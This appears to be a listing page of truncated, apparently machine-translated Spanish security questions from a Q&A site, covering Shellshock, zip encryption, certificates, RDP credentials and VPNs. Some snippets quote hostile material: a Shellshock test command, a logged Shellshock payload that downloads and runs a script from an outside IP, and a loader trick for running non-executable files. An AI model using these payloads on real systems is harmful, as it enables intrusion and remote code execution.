¿Es posible almacenar datos arbitrarios como documentos o un programa en forma de archivo de imagen, como una imagen PNG? Mi preocupación es que alguien pueda codificar datos para su uso por malware en una imagen y subirlos a un sitio como
¿Es posible almacenar datos arbitrarios como documentos o un programa en forma de archivo de imagen, como una imagen PNG? Mi preocupación es que alguien pueda codificar datos para su uso por malware en una imagen y subirlos a un sitio como
El comando de prueba x='() { :;}; echo vulnerable' bash muestra que mi instalación de Debian 8 (Jessie) es vulnerable, incluso con las últimas actualizaciones. La investigación muestra que hay un parche para estable e inestable, pero que las pruebas no tienen parches. Supongo que el parche...
El consejo estándar durante muchos años con respecto a la compresión y el cifrado ha sido que la fuerza de cifrado de zip es mala. ¿Es este realmente el caso hoy en día? Leí este artículo sobre WinZip (ha tenido la misma mala reputación). De acuerdo con ese artículo, el problema se elimina...
Dados los problemas recientes de los ataques Man-in-the-Middle, presté atención a la advertencia que recibí al conectarme a un servidor: Al seleccionar Ver certificado , iba a verificar la SHA1 huella digital : Publicado a : corsair Publicado por : corsair Válido de : 9/5/2013 a 3/7/2014...
Cerrado. Esta pregunta está fuera de tema . Actualmente no está aceptando respuestas. ¿Quieres mejorar esta pregunta? Actualice la pregunta para que sea sobre el tema para Superusuario. Cerrado hace 4 años . ¿Existe un administrador de contraseñas que...
Lo vi access.logen mi servidor de prueba: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf...
Estoy leyendo que deshabilitar Java, no JavaScript, hará que mi computadora sea más segura contra ataques de software malicioso. Todo indica que de hecho lo hará más seguro, pero no hay razones reales como lo que perderé en la experiencia de navegación, en todo caso. ¿Alguien puede decirme lo que...
Mientras leía esto , encontré el siguiente exploit: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Este...
¿Las credenciales de Escritorio remoto guardadas son seguras (en términos generales) en la máquina local? No se almacenan como texto claro en ninguna parte al menos, ¿verdad? Editar: entiendo los riesgos inherentes de guardar contraseñas. Ciertamente, aunque existe un espectro de efectividad, por...
Mi empresa planea comprar varias computadoras portátiles con fines de demostración en un stand de convenciones. Anteriormente, siempre compramos computadoras portátiles que tienen ranuras Kensington para las típicas cerraduras de cable. Ahora, la computadora portátil que más nos gusta es una...
¿Para qué es equivalente ntrights.exeen Windows 7? Lo necesito para poder ejecutarlo desde la línea de
No confiaría en Dropbox con mis datos bancarios y demás (porque hay muchas personas que buscan ese tipo de información), pero ¿es seguro conservar cosas que podrían ser valiosas para un pequeño número de personas? Por ejemplo, información comercialmente sensible, borradores de documentos...
Realmente me gusta este complemento HTTPS Everywhere para Firefox. Pero tiendo a saltar del navegador, ¿se han lanzado complementos similares que prefieren HTTPS para los otros navegadores
Dado que el exploit de ransomware WannaCry está dando vueltas, quería verificar si mi computadora tiene la actualización de seguridad específica que debería detener la vulnerabilidad, aparentemente, MS17-010, suponiendo que entiendo la vulnerabilidad y ese es realmente el parche correcto. ¿Cómo se...
Cerrada . Esta pregunta necesita estar más centrada . Actualmente no está aceptando respuestas. ¿Quieres mejorar esta pregunta?Actualice la pregunta para que se centre en un problema solo editando esta publicación . Cerrado hace 2 años . Recientemente, en...
Además de la pregunta titular, ¿son compatibles las dos tecnologías? De ser así, ¿bajo qué circunstancias? ¿Cuáles son los beneficios relativos de las dos
¿Cuáles son las opciones disponibles para proteger con contraseña una carpeta? Estoy hablando de requerir una contraseña para acceder realmente a la carpeta, no solo los derechos de acceso del usuario. ¿El software de terceros es seguro y estable? Cuales son las
Existen varios proveedores de servicios que permiten a un usuario evadir firewalls o anonimizar su acceso web. Algunos de ellos usan proxies, otros usan VPN. La mayoría de la gente dice que las VPN suelen funcionar mejor que los servidores proxy. También son generalmente más caros. Por ejemplo,...
Esto es algo que me he preguntado durante mucho tiempo. Si, por ejemplo, estoy usando Gmail a través de https, ¿alguien puede leer mis conversaciones y correos electrónicos de mensajería instantánea si uso una red inalámbrica no segura? Supongo que los datos serían seguros, ya que está utilizando...
¿Hay alguna forma directa de permitir que un usuario ejecute (por ejemplo) /usr/bin/pacman -S -u como root, sin permitirle correr /usr/bin/pacman -S -u some_package ? La línea user ALL=(root) NOPASSWD: /usr/bin/pacman -S -u permite ambos, y user ALL=(root) NOPASSWD: /usr/bin/pacman -S -u...